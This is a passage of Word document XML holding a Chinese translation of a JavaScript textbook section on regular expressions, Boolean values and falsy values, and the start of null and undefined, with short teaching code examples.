        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>采用</w:t>
      </w:r>
      <w:r>
        <w:t>Perl</w:t>
      </w:r>
      <w:r>
        <w:t>中的正则表达式语法。</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象均定义了利用正则表达式进行模式匹配和查找与替换的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>并不是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的基本类型。和</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>一样，它只是一种具有实用</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的特殊对象。正则表达式的语法很复杂，</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>也很丰富。在第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章有详尽的文档介绍。</w:t>
      </w:r>
      <w:r>
        <w:t>RgeExp</w:t>
      </w:r>
      <w:r>
        <w:t>是一种强大和常用的文本处理工具，本节只是一个概述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>并不是语言中的基本数据类型，但是它们依然具有直接量写法，可以直接在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中使用。在两条斜线之间的文本构成了一个正则表达式直接量。第二条斜线之后也可以跟随一个或多个字母，用来修饰匹配模式的含义，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/^HTML///</w:t>
      </w:r>
      <w:r>
        <w:t>匹配以</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>开始的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/[1-9][0-9]*///</w:t>
      </w:r>
      <w:r>
        <w:t>匹配一个非零数字，后面是任意个数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/\bjavascript\b/i//</w:t>
      </w:r>
      <w:r>
        <w:t>匹配单词</w:t>
      </w:r>
      <w:r>
        <w:t>"javascript"</w:t>
      </w:r>
      <w:r>
        <w:t>，忽略大小写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了很多有用的方法，字符串同样具有可以接收</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>参数的方法，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text="testing:1,2,3";//</w:t>
      </w:r>
      <w:r>
        <w:t>文本示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var pattern=/\d+/g//</w:t>
      </w:r>
      <w:r>
        <w:t>匹配所有包含一个或多个数字的实例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>pattern.test(text)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>匹配成功</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text.search(pattern)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>9:</w:t>
      </w:r>
      <w:r>
        <w:t>首次匹配成功的位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text.match(pattern)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>["1","2","3"]:</w:t>
      </w:r>
      <w:r>
        <w:t>所有匹配组成的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text.replace(pattern,"#")</w:t>
      </w:r>
      <w:r>
        <w:t>;//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"testing:#,#,#"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text.split(/\D+/);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>["","1","2","3"]:</w:t>
      </w:r>
      <w:r>
        <w:t>用非数字字符截取字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="3_3_Bu_Er_Zhi_"/>
      <w:r>
        <w:t>3.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　布尔值</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>布尔值指代真或假、开或关、是或否。这个类型只有两个值，保留字</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中的比较语句的结果通常都是布尔值，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a==4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这段代码用来检测变量</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>的值是否等于</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>。如果等于，比较结果的布尔值就是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；如果不等，比较结果则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>布尔值通常用于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的控制结构中。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScri</w:t>
      </w:r>
      <w:r>
        <w:t>pt</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>if/else</w:t>
      </w:r>
      <w:r>
        <w:t>语句，如果布尔值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>执行第一段逻辑，如果为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>执行另一段逻辑。通常将一个创建布尔值的比较直接与使用这个比较的语句结合在一起，结果如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a==4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>b=b+1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a=a+1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这段代码检测变量</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>是否等于</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>。如果等于，则</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>加</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>；否则，</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>加</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>。我们同样会在</w:t>
      </w:r>
      <w:r>
        <w:t>3.8</w:t>
      </w:r>
      <w:r>
        <w:t>节讨论到，任意</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的值都可以转换为布尔值。下面这些值会被转换成</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>-0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>""//</w:t>
      </w:r>
      <w:r>
        <w:t>空字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有其他值，包括所有对象（数组）都会转换成</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>和上面</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>个可以转换成</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>的值有时称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>假值</w:t>
      </w:r>
      <w:r>
        <w:t>”(falsy value)</w:t>
      </w:r>
      <w:r>
        <w:t>，其他值称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>真值</w:t>
      </w:r>
      <w:r>
        <w:t>”(truthy value)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>期望使用一个布尔值的时候，假值会被当成</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，真值会被当成</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>来看一个例子，假设变量</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>是一个对象或是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，可以通过一条</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句来显式地检测</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>是否是非</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o!==null)...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不等操作符</w:t>
      </w:r>
      <w:r>
        <w:t>“!==”</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>比较，并得出结果为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。可以先忽略这里的</w:t>
      </w:r>
      <w:r>
        <w:t>比较语句，</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>是一个假值，对象是一个真值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o)...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对于第一种情况，只有当</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>不是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>时才会执行</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>后的代码，第二种情况的限制没那么严格：只有</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>不是</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>或任何假值（比如</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>）时它才会执行这个</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>。到底选用哪条语句取决于期望赋给</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的值是什么。如果需要将</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:t>区分开来，则需要使用一个显式的比较。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>布尔值包含</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，因此可以使用这个方法将字符串转换为</w:t>
      </w:r>
      <w:r>
        <w:t>"true"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"false"</w:t>
      </w:r>
      <w:r>
        <w:t>，但它并不包含其他有用的方法。除了这个不重要的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，还有</w:t>
      </w:r>
      <w:r>
        <w:t>三个重要的布尔运算符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符执行了逻辑与（</w:t>
      </w:r>
      <w:r>
        <w:t>AND</w:t>
      </w:r>
      <w:r>
        <w:t>）操作。当且仅当两个操作数都是真值时它才返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>“||”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符是布尔或（</w:t>
      </w:r>
      <w:r>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:t>）操作，如果两个操作数其中之一为真值它就返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，如果两个操作数都是假值则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。最后，一元操作符</w:t>
      </w:r>
      <w:r>
        <w:t>“!”</w:t>
      </w:r>
      <w:r>
        <w:t>执</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>行了布尔非（</w:t>
      </w:r>
      <w:r>
        <w:t>NOT</w:t>
      </w:r>
      <w:r>
        <w:t>）操作：如果操作数是真值则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>；如果是假值，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if((x==0</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>y==0)||!(z==0)){//x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>都是零或</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:t>是非零</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关于操作数的完整的细节可以参照</w:t>
      </w:r>
      <w:r>
        <w:t>4.10</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="3_4_nullHe_undefined"/>
      <w:r>
        <w:t>3.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言的关键字，它表示一个特殊值，常用来描述</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>空值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。对</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>预算，结果返回字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"object"</w:t>
      </w:r>
      <w:r>
        <w:t>，也就是说，可以将</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>认为是一个特殊的对象值，含义是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>非对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。但实际上，通常认为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>是它自有类型的唯一一个成员，它可以表示数字、字符串和对象是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>无值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的。大多数编程语言和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>一样含有</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>：你可能对</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>nil</w:t>
      </w:r>
      <w:r>
        <w:t>很眼熟。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>还有第二个值来表示值的空缺。用未定义的值表示更深层次的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>空</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。它是变量的一种取值，表明变量没有初始化，如果要查询对象属性或数组元素的值时返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>则说明这个属性或元素不存在。如果函数没有返回任何值，则返回</w:t>
      </w:r>
      <w:r>
